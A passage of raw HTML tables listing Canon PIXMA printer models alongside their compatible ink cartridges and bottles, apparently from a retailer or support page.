<td>PGI-750XL (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td>PGI-755XXL (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"6\" align=\"center\">PIXMA MG2570S</td>\n      <td>CL-746 (Colour)</td>\n    </tr>\n    <tr>\n      <td>CL-746S (Colour)</td>\n    </tr>\n    <tr>\n      <td>CL-746XL (Colour)</td>\n    </tr>\n    <tr>\n      <td>PG-745 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td>PG-745S (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td>PG-745XL (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"6\" align=\"center\">PIXMA MG2577S</td>\n      <td>CL-746 (Colour)</td>\n    </tr>\n    <tr>\n      <td>CL-746S (Colour)</td>\n    </tr>\n    <tr>\n      <td>CL-746XL (Colour)</td>\n    </tr>\n    <tr>\n      <td>PG-745 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td>PG-745S (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td>PG-745XL (Pigment Black)</td>\n    </tr>\n    </tbody>\n  </table>  <table width=\"378\" border=\"1\" cellpadding=\"10\">\n    <tbody>\n    <tr>\n      <td width=\"170\"><strong>Model</strong></td>\n      <td width=\"208\"><strong>Cartridge / Bottle</strong></td>\n    </tr>\n    <tr>\n      <td rowspan=\"5\" align=\"center\">PIXMA MG3570</td>\n      <td>CL-741 (Colour)</td>\n    </tr>\n    <tr>\n      <td>CL-741XL (Colour)</td>\n    </tr>\n    <tr>\n      <td>PG-740 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td>PG-740/CL-741 Value Pack</td>\n    </tr>\n    <tr>\n      <td>PG-740XL (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"5\" align=\"center\">PIXMA MG3670</td>\n      <td>CL-741 (Colour)</td>\n    </tr>\n    <tr>\n      <td>CL-741XL (Colour)</td>\n    </tr>\n    <tr>\n      <td>PG-740 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td>PG-740/CL-741 Value Pack</td>\n    </tr>\n    <tr>\n      <td>PG-740XL (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"10\" align=\"center\">PIXMA MG7570</td>\n      <td>CLI-751 (Black)</td>\n    </tr>\n    <tr>\n      <td>CLI-751 (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-751 (Gray)</td>\n    </tr>\n    <tr>\n      <td>CLI-751 (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-751 (Yellow)</td>\n    </tr>\n    <tr>\n      <td>CLI-751XL (Black)</td>\n    </tr>\n    <tr>\n      <td>CLI-751XL (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-751XL (Gray)</td>\n    </tr>\n    <tr>\n      <td>CLI-751XL (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-751XL (Yellow)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"3\" align=\"center\">PIXMA MP160</td>\n      <td>CL-41 (Colour)</td>\n    </tr>\n    <tr>\n      <td>PG-40 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td>PG-40/CL-41 Value Pack</td>\n    </tr>\n    <tr>\n      <td rowspan=\"3\" align=\"center\">PIXMA MP170</td>\n      <td>CL-41 (Colour)</td>\n    </tr>\n    <tr>\n      <td>PG-40 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td>PG-40/CL-41 Value Pack</td>\n    </tr>\n    <tr>\n      <td rowspan=\"3\" align=\"center\">PIXMA MP180</td>\n      <td>CL-41 (Colour)</td>\n    </tr>\n    <tr>\n      <td>PG-40 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td>PG-40/CL-41 Value Pack</td>\n    </tr>\n    <tr>\n      <td rowspan=\"5\" align=\"center\">PIXMA MP228</td>\n      <td>CL-41 (Colour)</td>\n    </tr>\n    <tr>\n      <td>CL-831 (Colour)</td>\n    </tr>\n    <tr>\n      <td>PG-40 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td>PG-40/CL-41 Value Pack</td>\n    </tr>\n    <tr>\n      <td>PG-830 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"6\" align=\"center\">PIXMA MP237</td>\n      <td>CL-811 (Colour)</td>\n    </tr>\n    <tr>\n      <td>CL-811XL (Colour)</td>\n    </tr>\n    <tr>\n      <td>PG-810 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td>PG-810 Twin Pack</td>\n    </tr>\n    <tr>\n      <td>PG-810/CL-811 Value Pack</td>\n    </tr>\n    <tr>\n      <td>PG-810XL (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"6\" align=\"center\">PIXMA MP245</td>\n      <td>CL-811 (Colour)</td>\n    </tr>\n    <tr>\n      <td>CL-811XL (Colour)</td>\n    </tr>\n    <tr>\n      <td>PG-810 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td>PG-810 Twin Pack</td>\n    </tr>\n    <tr>\n      <td>PG-810/CL-811 Value Pack</td>\n    </tr>\n    <tr>\n      <td>PG-810XL (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"6\" align=\"center\">PIXMA MP258</td>\n      <td>CL-811 (Colour)</td>\n    </tr>\n    <tr>\n      <td>CL-811XL (Colour)</td>\n    </tr>\n    <tr>\n      <td>PG-810 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td>PG-810 Twin Pack</td>\n    </tr>\n    <tr>\n      <td>PG-810/CL-811 Value Pack</td>\n    </tr>\n    <tr>\n      <td>PG-810XL (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"6\" align=\"center\">PIXMA MP276</td>\n      <td>CL-811 (Colour)</td>\n    </tr>\n    <tr>\n      <td>CL-811XL (Colour)</td>\n    </tr>\n    <tr>\n      <td>PG-810 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td>PG-810 Twin Pack</td>\n    </tr>\n    <tr>\n      <td>PG-810/CL-811 Value Pack</td>\n    </tr>\n    <tr>\n      <td>PG-810XL (Pigment Black)</td>\n    </tr>\n    </tbody>\n  </table><table width=\"378\" border=\"1\" cellpadding=\"10\">\n  <tbody>\n    <tr>\n      <td width=\"170\"><strong>Model</strong></td>\n      <td width=\"170\"><strong>Cartridge / Bottle</strong></td>\n    </tr>\n    <tr>\n      <td rowspan=\"6\" align=\"center\">PIXMA MP287</td>\n      <td>CL-811 (Colour)</td>\n    </tr>\n    <tr>\n      <td>CL-811XL (Colour)</td>\n    </tr>\n    <tr>\n      <td>PG-810 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td>PG-810 Twin Pack</td>\n    </tr>\n    <tr>\n      <td>PG-810/CL-811 Value Pack</td>\n    </tr>\n    <tr>\n      <td>PG-810XL (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"3\" align=\"center\">PIXMA MP460</td>\n      <td>CL-41 (Colour)</td>\n    </tr>\n    <tr>\n      <td>PG-40 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td>PG-40/CL-41 Value Pack</td>\n    </tr>\n    <tr>\n      <td rowspan=\"5\" align=\"center\">PIXMA MP476</td>\n      <td>CL-41 (Colour)</td>\n    </tr>\n    <tr>\n      <td>CL-831 (Colour)</td>\n    </tr>\n    <tr>\n      <td>PG-40 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td>PG-40/CL-41 Value Pack</td>\n    </tr>\n    <tr>\n      <td>PG-830 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"6\" align=\"center\">PIXMA MP486</td>\n      <td>CL-811 (Colour)</td>\n    </tr>\n    <tr>\n      <td>CL-811XL (Colour)</td>\n    </tr>\n    <tr>\n      <td>PG-810 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td>PG-810 Twin Pack</td>\n    </tr>\n    <tr>\n      <td>PG-810/CL-811 Value Pack</td>\n    </tr>\n    <tr>\n      <td>PG-810XL (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"6\" align=\"center\">PIXMA MP496</td>\n      <td>CL-811 (Colour)</td>\n    </tr>\n    <tr>\n      <td>CL-811XL (Colour)</td>\n    </tr>\n    <tr>\n      <td>PG-810 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td>PG-810 Twin Pack</td>\n    </tr>\n    <tr>\n      <td>PG-810/CL-811 Value Pack</td>\n    </tr>\n    <tr>\n      <td>PG-810XL (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"6\" align=\"center\">PIXMA MP497</td>\n      <td>CL-811 (Colour)</td>\n    </tr>\n    <tr>\n      <td>CL-811XL (Colour)</td>\n    </tr>\n    <tr>\n      <td>PG-810 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td>PG-810 Twin Pack</td>\n    </tr>\n    <tr>\n      <td>PG-810/CL-811 Value Pack</td>\n    </tr>\n    <tr>\n      <td>PG-810XL (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"5\" align=\"center\">PIXMA MP500</td>\n      <td>CLI-8 (Black)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Yellow)</td>\n    </tr>\n    <tr>\n      <td>PGI-5 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"4\" align=\"center\">PIXMA MP520</td>\n      <td>CLI-8 (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Yellow)</td>\n    </tr>\n    <tr>\n      <td>PGI-5 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"5\" align=\"center\">PIXMA MP530</td>\n      <td>CLI-8 (Black)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Yellow)</td>\n    </tr>\n    <tr>\n      <td>PGI-5 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"5\" align=\"center\">PIXMA MP568</td>\n      <td>CLI-821 (Black)</td>\n    </tr>\n    <tr>\n      <td>CLI-821 (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-821 (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-821 (Yellow)</td>\n    </tr>\n    <tr>\n      <td>PGI-820 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"5\" align=\"center\">PIXMA MP600</td>\n      <td>CLI-8 (Black)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Yellow)</td>\n    </tr>\n    <tr>\n      <td>PGI-5 (Pigment Black)</td>\n    </tr>\n  </tbody>\n</table>\n<table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MP610</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP628</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP638</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP648</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP800</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP800R</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP810</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP830</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP970</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP988</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP996</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MX308</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-831 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-830 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX328</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX338</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX347</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX366</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX426</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX876</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX886</p></td><td width=\"208\"><p>CLI-726 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-726 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-726 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-726 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-725 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA PRO-1</p></td><td width=\"208\"><p>PGI-29 (Chroma Optimizer)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Dark Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Light Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Matte Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Photo Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Red)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Yellow)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA PRO-10</p></td><td width=\"208\"><p>PGI-72 (Chroma Optimizer)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Matte Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Photo Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Red)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA PRO-100</p></td><td width=\"208\"><p>CLI-42 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Light Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA TR8570</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS207</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS307</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS5070</p></td><td width=\"208\"><p>CLI-771 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-770 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-770XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS5170</p></td><td width=\"208\"><p>CL-741 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-741XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740/CL-741 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740XL (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA TS8270</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS9170</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 